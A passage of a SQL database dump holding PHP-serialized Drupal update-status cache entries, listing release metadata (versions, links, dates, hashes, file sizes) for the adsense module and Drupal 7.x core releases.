7.x-1.0\";s:7:\"version\";s:7:\"7.x-1.0\";s:3:\"tag\";s:7:\"7.x-1.0\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"0\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1510874\";s:13:\"download_link\";s:59:\"http://ftp.drupal.org/files/projects/adsense-7.x-1.0.tar.gz\";s:4:\"date\";s:10:\"1333237238\";s:6:\"mdhash\";s:32:\"f018f7bbc01929c208645ee8eadea4d6\";s:8:\"filesize\";s:5:\"46461\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:0:{}}s:13:\"7.x-1.0-beta1\";a:14:{s:4:\"name\";s:21:\"adsense 7.x-1.0-beta1\";s:7:\"version\";s:13:\"7.x-1.0-beta1\";s:3:\"tag\";s:13:\"7.x-1.0-beta1\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1498710\";s:13:\"download_link\";s:65:\"http://ftp.drupal.org/files/projects/adsense-7.x-1.0-beta1.tar.gz\";s:4:\"date\";s:10:\"1332621937\";s:6:\"mdhash\";s:32:\"6f43dc62922be81662de7a24efcfd166\";s:8:\"filesize\";s:5:\"46478\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:11:\"7.x-1.x-dev\";a:13:{s:4:\"name\";s:19:\"adsense 7.x-1.x-dev\";s:7:\"version\";s:11:\"7.x-1.x-dev\";s:3:\"tag\";s:7:\"7.x-1.x\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_extra\";s:3:\"dev\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1055594\";s:13:\"download_link\";s:63:\"http://ftp.drupal.org/files/projects/adsense-7.x-1.x-dev.tar.gz\";s:4:\"date\";s:10:\"1427472481\";s:6:\"mdhash\";s:32:\"0dbba1c06e7659fcfbcf65d740a9426a\";s:8:\"filesize\";s:5:\"47696\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:0:{}}}}',1451398473,1451312069,1),('available_releases::drupal','a:11:{s:5:\"title\";s:11:\"Drupal core\";s:10:\"short_name\";s:6:\"drupal\";s:4:\"type\";s:12:\"project_core\";s:11:\"api_version\";s:3:\"7.x\";s:17:\"recommended_major\";s:1:\"7\";s:16:\"supported_majors\";s:1:\"7\";s:13:\"default_major\";s:1:\"7\";s:14:\"project_status\";s:9:\"published\";s:4:\"link\";s:37:\"https://www.drupal.org/project/drupal\";s:5:\"terms\";s:15:\"\n \n \n \n \";s:8:\"releases\";a:57:{s:4:\"7.41\";a:13:{s:4:\"name\";s:11:\"drupal 7.41\";s:7:\"version\";s:4:\"7.41\";s:3:\"tag\";s:4:\"7.41\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"41\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.41-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.41.tar.gz\";s:4:\"date\";s:10:\"1445457239\";s:6:\"mdhash\";s:32:\"7636e75e8be213455b4ac7911ce5801f\";s:8:\"filesize\";s:7:\"3257325\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.40\";a:13:{s:4:\"name\";s:11:\"drupal 7.40\";s:7:\"version\";s:4:\"7.40\";s:3:\"tag\";s:4:\"7.40\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"40\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.40-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.40.tar.gz\";s:4:\"date\";s:10:\"1444865639\";s:6:\"mdhash\";s:32:\"d4509f13c23999a76e61ec4d5ccfaf26\";s:8:\"filesize\";s:7:\"3257401\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:4:\"7.39\";a:13:{s:4:\"name\";s:11:\"drupal 7.39\";s:7:\"version\";s:4:\"7.39\";s:3:\"tag\";s:4:\"7.39\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"39\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.39-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.39.tar.gz\";s:4:\"date\";s:10:\"1440019139\";s:6:\"mdhash\";s:32:\"6f42a7e9c7a1c2c4c9c2f20c81b8e79a\";s:8:\"filesize\";s:7:\"3249343\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.38\";a:13:{s:4:\"name\";s:11:\"drupal 7.38\";s:7:\"version\";s:4:\"7.38\";s:3:\"tag\";s:4:\"7.38\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"38\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.38-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.38.tar.gz\";s:4:\"date\";s:10:\"1434566280\";s:6:\"mdhash\";s:32:\"c18298c1a5aed32ddbdac605fdef7fce\";s:8:\"filesize\";s:7:\"3247864\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.37\";a:13:{s:4:\"name\";s:11:\"drupal 7.37\";s:7:\"version\";s:4:\"7.37\";s:3:\"tag\";s:4:\"7.37\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"37\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.37-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.37.tar.gz\";s:4:\"date\";s:10:\"1430972281\";s:6:\"mdhash\";s:32:\"3a70696c87b786365f2c6c3aeb895d8a\";s:8:\"filesize\";s:7:\"3244291\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:4:\"7.36\";a:13:{s:4:\"name\";s:11:\"drupal 7.36\";s:7:\"version\";s:4:\"7.36\";s:3:\"tag\";s:4:\"7.36\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"36\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.36-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.36.tar.gz\";s:4:\"date\";s:10:\"1427943181\";s:6:\"mdhash\";s:32:\"98e1f62c11a5dc5f9481935eefc814c5\";s:8:\"filesize\";s:7:\"3244905\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:4:\"7.35\";a:13:{s:4:\"name\";s:11:\"drupal 7.35\";s:7:\"version\";s:4:\"7.35\";s:3:\"tag\";s:4:\"7.35\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"35\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.35-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.35.tar.gz\";s:4:\"date\";s:10:\"1426706281\";s:6:\"mdhash\";s:32:\"fecc55bd0bd476bc35d9ebf68452942d\";s:8:\"filesize\";s:7:\"3234349\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.34\";a:13:{s:4:\"name\";s:11:\"drupal 7.34\";s:7:\"version\";s:4:\"7.34\";s:3:\"tag\";s:4:\"7.34\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"34\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.34-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.34.tar.gz\";s:4:\"date\";s:10:\"1416429264\";s:6:\"mdhash\";s:32:\"bb4d212e1eb1d7375e41613fbefa04f2\";s:8:\"filesize\";s:7:\"3229858\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.33\";a:13:{s:4:\"name\";s:11:\"drupal 7.33\";s:7:\"version\";s:4:\"7.33\";s:3:\"tag\";s:4:\"7.33\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"33\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.33-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.33.tar.gz\";s:4:\"date\";s:10:\"1415374080\";s:6:\"mdhash\";s:32:\"187b076a5753960d5d5cb12d30d93e73\";s:8:\"filesize\";s:7:\"3229397\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:4:\"7.32\";a:13:{s:4:\"name\";s:11:\"drupal 7.32\";s:7:\"version\";s:4:\"7.32\";s:3:\"tag\";s:4:\"7.32\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"32\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.32-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.32.tar.gz\";s:4:\"date\";s:10:\"1413387329\";s:6:\"mdhash\";s:32:\"d5d121a6ce974f2d20604a7e10e1987a\";s:8:\"filesize\";s:7:\"3215563\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.31\";a:13:{s:4:\"name\";s:11:\"drupal 7.31\";s:7:\"version\";s:4:\"7.31\";s:3:\"tag\";s:4:\"7.31\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"31\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.31-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.31.tar.gz\";s:4:\"date\";s:10:\"1407346427\";s:6:\"mdhash\";s:32:\"de256f202930d3ef5ccc6aebc550adaf\";s:8:\"filesize\";s:7:\"3216766\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.30\";a:13:{s:4:\"name\";s:11:\"drupal 7.30\";s:7:\"version\";s:4:\"7.30\";s:3:\"tag\";s:4:\"7.30\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"30\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.30-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.30.tar.gz\";s:4:\"date\";s:10:\"1406239728\";s:6:\"mdhash\";s:32:\"ef7bce65ca6395f1e6bc44c15fdbc3cb\";s:8:\"filesize\";s:7:\"3215744\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.29\";a:13:{s:4:\"name\";s:11:\"drupal 7.29\";s:7:\"version\";s:4:\"7.29\";s:3:\"tag\";s:4:\"7.29\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"29\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.29-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.29.tar.gz\";s:4:\"date\";s:10:\"1405543128\";s:6:\"mdhash\";s:32:\"6ffdfb0ee08fadfb531c7fed1d2c5633\";s:8:\"filesize\";s:7:\"3213499\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.28\";a:13:{s:4:\"name\";s:11:\"drupal 7.28\";s:7:\"version\";s:4:\"7.28\";s:3:\"tag\";s:4:\"7.28\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"28\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.28-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.28.tar.gz\";s:4:\"date\";s:10:\"1399522729\";s:6:\"mdhash\";s:32:\"6255884d7e15c654fc8856805b271551\";s:8:\"filesize\";s:7:\"3212823\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.27\";a:13:{s:4:\"name\";s:11:\"drupal 7.27\";s:7:\"version\";s:4:\"7.27\";s:3:\"tag\";s:4:\"7.27\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"27\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.27-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.27.tar.gz\";s:4:\"date\";s:10:\"1397686464\";s:6:\"mdhash\";s:32:\"e9b05562f1a7f8bbcb5922cd3a0d55cb\";s:8:\"filesize\";s:7:\"3207398\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.26\";a:13:{s:4:\"name\";s:11:\"drupal 7.26\";s:7:\"version\";s:4:\"7.26\";s:3:\"tag\";s:4:\"7.26\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"26\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.26-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.26.tar.gz\";s:4:\"date\";s:10:\"1389815904\";s:6:\"mdhash\";s:32:\"740bd57f524b8ac18a203b663ca1329d\";s:8:\"filesize\";s:7:\"3204587\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.25\";a:13:{s:4:\"name\";s:11:\"drupal 7.25\";s:7:\"version\";s:4:\"7.25\";s:3:\"tag\";s:4:\"7.25\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"25\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.25-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.25.tar.gz\";s:4:\"date\";s:10:\"1388709505\";s:6:\"mdhash\";s:32:\"25906158083d89aa86534df1c683b4ea\";s:8:\"filesize\";s:7:\"3203256\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:4:\"7.24\";a:13:{s:4:\"name\";s:11:\"drupal 7.24\";s:7:\"version\";s:4:\"7.24\";s:3:\"tag\";s:4:\"7.24\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"24\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.24-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.24.tar.gz\";s:4:\"date\";s:10:\"1384982905\";s:6:\"mdhash\";s:32:\"c1ddb37155e4b6160f6508636c06f2a7\";s:8:\"filesize\";s:7:\"3195735\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.23\";a:13:{s:4:\"name\";s:11:\"drupal 7.23\";s:7:\"version\";s:4:\"7.23\";s:3:\"tag\";s:4:\"7.23\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"23\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.23-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.23.tar.gz\";s:4:\"date\";s:10:\"1375928239\";s:6:\"mdhash\";s:32:\"0beca6fec15b8cf8c35a6fdda6675342\";s:8:\"filesize\";s:7:\"3191695\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.22\";a:13:{s:4:\"name\";s:11:\"drupal 7.22\";s:7:\"version\";s:4:\"7.22\";s:3:\"tag\";s:4:\"7.22\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"22\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.22-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.22.tar.gz\";s:4:\"date\";s:10:\"1365027013\";s:6:\"mdhash\";s:32:\"068d7a77958fce6bb002659aa7ccaeb7\";s:8:\"filesize\";s:7:\"3183014\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.21\";a:13:{s:4:\"name\";s:11:\"drupal 7.21\";s:7:\"version\";s:4:\"7.21\";s:3:\"tag\";s:4:\"7.21\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"21\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.21-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.21.tar.gz\";s:4:\"date\";s:10:\"1362616997\";s:6:\"mdhash\";s:32:\"eff054cd53be39ff719f77c81dce1aac\";s:8:\"filesize\";s:7:\"3163798\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.20\";a:13:{s:4:\"name\";s:11:\"drupal 7.20\";s:7:\"version\";s:4:\"7.20\";s:3:\"tag\";s:4:\"7.20\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"20\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.20-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.20.tar.gz\";s:4:\"date\";s:10:\"1361393684\";s:6:\"mdhash\";s:32:\"ee576d63f1fd8a1f1c072a56978da0c5\";s:8:\"filesize\";s:7:\"3163257\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.19\";a:13:{s:4:\"name\";s:11:\"drupal 7.19\";s:7:\"version\";s:4:\"7.19\";s:3:\"tag\";s:4:\"7.19\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"19\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.19-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.19.tar.gz\";s:4:\"date\";s:10:\"1358374871\";s:6:\"mdhash\";s:32:\"c1dd3960f1555df208c80ef612e0c53a\";s:8:\"filesize\";s:7:\"3163130\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.18\";a:13:{s:4:\"name\";s:11:\"drupal 7.18\";s:7:\"version\";s:4:\"7.18\";s:3:\"tag\";s:4:\"7.18\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"18\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.18-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.18.tar.gz\";s:4:\"date\";s:10:\"1355944004\";s:6:\"mdhash\";s:32:\"5c048f60a53acd7cb3c2b6d5fe42f082\";s:8:\"filesize\";s:7:\"3162333\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.17\";a:13:{s:4:\"name\";s:11:\"drupal 7.17\";s:7:\"version\";s:4:\"7.17\";s:3:\"tag\";s:4:\"7.17\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"17\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.17-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.17.tar.gz\";s:4:\"date\";s:10:\"1352325358\";s:6:\"mdhash\";s:32:\"439e8ca7e6a33bb879a4624d8f01bed0\";s:8:\"filesize\";s:7:\"3162429\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.16\";a:13:{s:4:\"name\";s:11:\"drupal 7.16\";s:7:\"version\";s:4:\"7.16\";s:3:\"tag\";s:4:\"7.16\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"16\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1815904\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.16.tar.gz\";s:4:\"date\";s:10:\"1350508568\";s:6:\"mdhash\";s:32:\"352497b2df94b5308e31cb8da020b631\";s:8:\"filesize\";s:7:\"3142889\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.15\";a:13:{s:4:\"name\";s:11:\"drupal 7.15\";s:7:\"version\";s:4:\"7.15\";s:3:\"tag\";s:4:\"7.15\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"15\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1708292\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.15.tar.gz\";s:4:\"date\";s:10:\"1343839327\";s:6:\"mdhash\";s:32:\"f42c9baccd74e1d035d61ff537ae21b4\";s:8:\"filesize\";s:7:\"3142219\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.14\";a:13:{s:4:\"name\";s:11:\"drupal 7.14\";s:7:\"version\";s:4:\"7.14\";s:3:\"tag\";s:4:\"7.14\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"14\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1558424\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.14.tar.gz\";s:4:\"date\";s:10:\"1335997556\";s:6:\"mdhash\";s:32:\"af7abd95c03ecad4e1567ed94a438334\";s:8:\"filesize\";s:7:\"3128473\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:4:\"7.13\";a:13:{s:4:\"name\";s:11:\"drupal 7.13\";s:7:\"version\";s:4:\"7.13\";s:3:\"tag\";s:4:\"7.13\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"13\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1558412\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.13.tar.gz\";s:4:\"date\";s:10:\"1335997261\";s:6:\"mdhash\";s:32:\"80587b66375c7fc539414a20a2c6f2de\";s:8:\"filesize\";s:7:\"3088448\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.12\";a:13:{s:4:\"name\";s:11:\"drupal 7.12\";s:7:\"version\";s:4:\"7.12\";s:3:\"tag\";s:4:\"7.12\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"12\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1425104\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.12.tar.gz\";s:4:\"date\";s:10:\"1328134561\";s:6:\"mdhash\";s:32:\"db2284beb97241c9bdca9c638cd8a4f1\";s:8:\"filesize\";s:7:\"3088472\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:4:\"7.11\";a:13:{s:4:\"name\";s:11:\"drupal 7.11\";s:7:\"version\";s:4:\"7.11\";s:3:\"tag\";s:4:\"7.11\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"11\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1425092\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.11.tar.gz\";s:4:\"date\";s:10:\"1328134275\";s:6:\"mdhash\";s:32:\"e9857e1749762367d7631d74cc6564a7\";s:8:\"filesize\";s:7:\"2789336\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:4:\"7.10\";a:13:{s:4:\"name\";s:11:\"drupal 7.10\";s:7:\"version\";s:4:\"7.10\";s:3:\"tag\";s:4:\"7.10\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"10\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1361968\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.10.tar.gz\";s:4:\"date\";s:10:\"1323125439\";s:6:\"mdhash\";s:32:\"1caafb849bc756e62dd874b90b95ab31\";s:8:\"filesize\";s:7:\"3067653\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:3:\"7.9\";a:13:{s:4:\"name\";s:10:\"drupal 7.9\";s:7:\"version\";s:3:\"7.9\";s:3:\"tag\";s:3:\"7.9\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"9\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1322736\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.9.tar.gz\";s:4:\"date\";s:10:\"1319660731\";s:6:\"mdhash\";s:32:\"7f45f109c413ca69ebb6e3140ed47225\";s:8:\"filesize\";s:7:\"2788086\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:3:\"7.8\";a:13:{s:4:\"name\";s:10:\"drupal 7.8\";s:7:\"version\";s:3:\"7.8\";s:3:\"tag\";s:3:\"7.8\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"8\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1265840\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.8.tar.gz\";s:4:\"date\";s:10:\"1314817617\";s:6:\"mdhash\";s:32:\"e0226b56e8d5c57c6b126e8ed5866b1f\";s:8:\"filesize\";s:7:\"2766967\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.7\";a:13:{s:4:\"name\";s:10:\"drupal 